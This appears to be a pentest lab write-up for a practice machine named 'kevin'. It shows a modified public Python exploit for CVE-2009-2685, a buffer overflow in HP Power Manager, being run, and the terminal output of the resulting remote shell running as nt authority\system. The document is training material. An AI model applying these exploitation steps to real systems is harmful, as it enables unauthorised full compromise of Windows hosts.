InfoSec LAB

Kevin_Exploitation

Created: 2 min read

CVE-2009-2685

The target web application, HP Power Manager, might be vulnerable to CVE-2009-2685 as it appears to be an outdated instance.

Exploitation

Executing the modified Python exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/kevin]
└─$ python2 CVE-2009-2685.py $IP
 
##//#############################################################################################################
##							##							#
## Vulnerability: HP Power Manager 'formExportDataLogs' ##  FormExportDataLogs Buffer Overflow	 		#
## 							##  HP Power Manager				 	#
## Vulnerable Application: HP Power Manager	 	##  This is a part of the Metasploit Module, 		#
## Tested on Windows [Version 6.1.7600] 		##  exploit/windows/http/hp_power_manager_filename	#
##							##							#
## Author: Muhammad Haidari				##  Spawns a shell to same window			#
## Contact: ghmh@outlook.com				##							#
## Website: www.github.com/muhammd			##							#
##							##							#
##//#############################################################################################################
##
##
## TODO: adjust 
##
## Usage: python hpm_exploit.py <Remote IP Address>
 
[+] Payload Fired... She will be back in less than a min...
[+] Give me 30 Sec!
(UNKNOWN) [192.168.221.45] 1234 (?) open
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
kevin
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::e080:ee0d:fa86:17a%15
   IPv4 Address. . . . . . . . . . . : 192.168.221.45
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.221.254
 
Tunnel adapter Reusable ISATAP Interface {AD5249E3-105D-452D-AF94-6E3E29548657}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Exploit successfully executed Initial Foothold established to the target system as SYSTEM System level compromise

Interactive Graph View

Backlinks